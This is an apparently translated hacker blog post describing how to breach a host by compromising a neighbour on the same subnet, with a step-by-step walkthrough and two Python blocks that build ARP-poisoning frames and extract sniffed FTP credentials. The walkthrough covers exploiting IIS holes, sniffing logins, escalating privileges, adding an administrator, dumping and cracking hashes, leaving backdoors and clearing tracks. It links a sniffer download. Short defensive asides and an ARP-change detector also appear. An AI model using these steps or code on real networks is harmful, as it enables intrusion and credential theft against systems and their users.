Source: http://xiaomutou.51.net/ciker/blog/
1. What is a penetration attack:
Simply put, the hacked host has no obvious system vulnerabilities, so you reach it by going through other hosts in the same network segment (CIDR block).
Core technologies:
1: Data sniffing in switched and non-switched environments,
2: IP spoofing, which still works against Linux/Unix systems.
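The first core technique, sniffing in a switched environment, works by poisoning ARP caches: the sniffer host keeps telling the target that the gateway's IP belongs to the sniffer's MAC (and tells the gateway the same about the target), so the switch delivers both directions of the target's traffic to the sniffer. The block below is an added illustration, not code from the original post or from the arpsniffer tool it uses. It builds the raw Ethernet+ARP reply frames (no sending; the addresses are constructed assumptions) and, on the defensive side, shows the check a network monitor would run to catch the poisoning: an IP that suddenly "moves" to a different MAC.

```python
import struct
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REPLY = 2               # ARP opcode 2 = reply (1 = request)

# Constructed sample addresses (assumptions, not from the original post).
AA_IP, AA_MAC = "192.168.1.10", "00:0c:29:aa:aa:aa"   # target host AA
BB_IP, BB_MAC = "192.168.1.20", "00:0c:29:bb:bb:bb"   # hacked host BB running the sniffer
GW_IP, GW_MAC = "192.168.1.1", "00:50:56:01:01:01"    # gateway


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP reply that says 'sender_ip is at sender_mac'.

    Most stacks accept such a reply even when they never asked and overwrite the
    cache entry for sender_ip. The switch still forwards by MAC, but the victim now
    addresses the attacker's MAC, so the attacker sees the traffic.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, oper=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an Ethernet+ARP frame; returns None for anything that is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def poison_pair(attacker_mac: str, victim_mac: str, victim_ip: str,
                gateway_mac: str, gateway_ip: str) -> List[bytes]:
    """The two replies a sniffer host keeps re-sending to sit between victim and gateway:
    victim learns gateway_ip -> attacker_mac, gateway learns victim_ip -> attacker_mac.
    The attacker must forward the traffic on, or the victim loses connectivity."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),
    ]


class ArpWatch:
    """Detection side: remember which MAC each IP claimed in ARP replies and
    raise an alert when an IP suddenly 'moves' to a different MAC."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> None:
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] != ARP_REPLY:
            return
        known = self.table.get(pkt["sender_ip"])
        if known is not None and known != pkt["sender_mac"]:
            self.alerts.append(f"{pkt['sender_ip']} moved from {known} to {pkt['sender_mac']}")
        self.table[pkt["sender_ip"]] = pkt["sender_mac"]


def run_demo() -> List[str]:
    """Replay two legitimate replies, then BB's poisoning pair, through the watcher."""
    watch = ArpWatch()
    watch.observe(build_arp_reply(GW_MAC, GW_IP, AA_MAC, AA_IP))   # gateway answers AA
    watch.observe(build_arp_reply(AA_MAC, AA_IP, GW_MAC, GW_IP))   # AA answers gateway
    for frame in poison_pair(BB_MAC, AA_MAC, AA_IP, GW_MAC, GW_IP):
        watch.observe(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print("ALERT:", alert)
```

The watcher is the same check that static ARP entries or a switch's dynamic ARP inspection enforce in hardware: one IP, one MAC, and any change is suspicious. Note that the poisoning has to be repeated every few seconds because the victim's cache entry expires and a genuine reply from the gateway would restore it.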
2. Attack process:
Scan the target host (determine the OS type and whether FTP, Telnet or SSH is enabled)
|
Scan the other hosts in the same subnet (find a vulnerability and get admin; ideally one with 3389 open)
|
Determine the network topology (locate the gateway and determine whether it is a switched or non-switched environment)
|
Install the appropriate sniffing program on the other hacked host
|
Use the sniffed user name and password to access the target...
|
Leave a backdoor and clear your footprints...
3. The whole process of hacking www.xxx.com
1. Ping the IP address (call this host AA); the returned TTL is over one hundred, which in most cases means Windows NT (NT's default TTL is 128, most Unix systems use 64).
2. Open X-Scan and look at the open ports: not many, but FTP is open, version Serv-U 4.0.
No holes (the other scans are not written up here; in short, the host itself has no holes).
3. Use X-Scan to scan the same C-class segment (the IP block), focusing on IIS holes (found four or five hosts with the .idq/.ida overflow).
4. Check which ports are open on these four or five machines (lucky enough, one of them has port 3389 open).
5. Get onto the host with 3389 enabled (call it BB) and install CaptureNet (a sniffer that is only useful in a non-switched environment). Run it and see that it only receives BB's own traffic and broadcast data, so the network uses a switch.
6. Install arpsniffer on BB (a sniffer for switched environments, http://666w.com/tools/aps.zip) and tracert to other hosts to find the gateway (you can also see it in BB's TCP/IP settings).
7. Run arpsniffer on BB with AA as the target and port 21 as the listening port.
9. Wait... a few days later, log on to BB, view arpsniffer's log file, and find the user name and password!
10. FTP in (the account is active and unrestricted). Upload the latest privilege escalation tool eruanasx.exe/DLL (and a bat file) to an executable directory and run the command ...... add an administrator first! (The system does not have the latest hotfix.)
11. Then try an IPC$ connection, which prompts "The command completed successfully" ...... Haha, finally got admin :)
12. Run pwdump3 to get the password hashes of all users on AA, then crack them with LC4 ......
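Steps 7 to 9 depend on FTP sending the user name and password in clear text on the control channel, which is exactly what arpsniffer's port-21 log captures. The block below is an added example, not code from the original post or from arpsniffer: it takes a constructed client/server exchange (the account names and replies are made up) and pulls out USER/PASS pairs, using the server's reply code to tell an accepted password (230) from a rejected one (530), so a failed guess is not mistaken for a working login. It also reassembles commands that were split across packets, which a naive line-by-line grep of a capture would miss.

```python
import re
from typing import List, Tuple

# Constructed sample of the control-channel exchange a sniffer on port 21 would
# record (not a real capture; account names and passwords are made up).
CAPTURED = [
    ("c2s", b"USER anonymous\r\n"),
    ("s2c", b"331 Password required for anonymous.\r\n"),
    ("c2s", b"PASS guest@\r\n"),
    ("s2c", b"530 Login incorrect.\r\n"),
    ("c2s", b"USER webadmin\r\n"),
    ("s2c", b"331 Password required for webadmin.\r\n"),
    ("c2s", b"PASS S3rv-U!pass\r\n"),
    ("s2c", b"230 User webadmin logged in.\r\n"),
    ("c2s", b"PWD\r\n"),
    ("s2c", b"257 \"/\" is current directory.\r\n"),
]

CMD_RE = re.compile(rb"^(USER|PASS)[ \t]+(.*)$", re.IGNORECASE)

# (user, password, status) where status is "ok", "rejected" or "unconfirmed"
Login = Tuple[str, str, str]


def extract_ftp_logins(segments) -> List[Login]:
    """Walk the sniffed control-channel payloads and pair USER/PASS with the server
    verdict: 230 confirms the password, 530 rejects it. An attempt with no verdict
    in the capture is reported as unconfirmed rather than silently dropped."""
    logins: List[Login] = []
    user = password = None
    buffers = {"c2s": b"", "s2c": b""}
    for direction, payload in segments:
        buffers[direction] += payload          # reassemble lines split across packets
        while b"\r\n" in buffers[direction]:
            line, buffers[direction] = buffers[direction].split(b"\r\n", 1)
            if direction == "c2s":
                m = CMD_RE.match(line)
                if not m:
                    continue                   # PWD, LIST, etc. are not credentials
                cmd, arg = m.group(1).upper(), m.group(2).decode("latin-1")
                if cmd == b"USER":
                    user, password = arg, None  # a new USER starts a new attempt
                else:
                    password = arg
            else:
                code = line[:3]
                if user is not None and password is not None and code in (b"230", b"530"):
                    logins.append((user, password, "ok" if code == b"230" else "rejected"))
                    user = password = None
    if user is not None and password is not None:
        logins.append((user, password, "unconfirmed"))
    return logins


def valid_credentials(segments) -> List[Tuple[str, str]]:
    """Only the pairs the server actually accepted."""
    return [(u, p) for u, p, status in extract_ftp_logins(segments) if status == "ok"]


if __name__ == "__main__":
    for user, password, status in extract_ftp_logins(CAPTURED):
        print(f"{status:<11} {user}:{password}")
```

The same reply-code check is what makes the sniffed log worth waiting days for: the one pair that came back with a 230 is the one to use in step 10, and it is also the pair a defender should rotate first. The defensive conclusion is the obvious one: Serv-U and every other plaintext FTP server hands out credentials to anyone on the segment, and SFTP or FTPS removes this whole step.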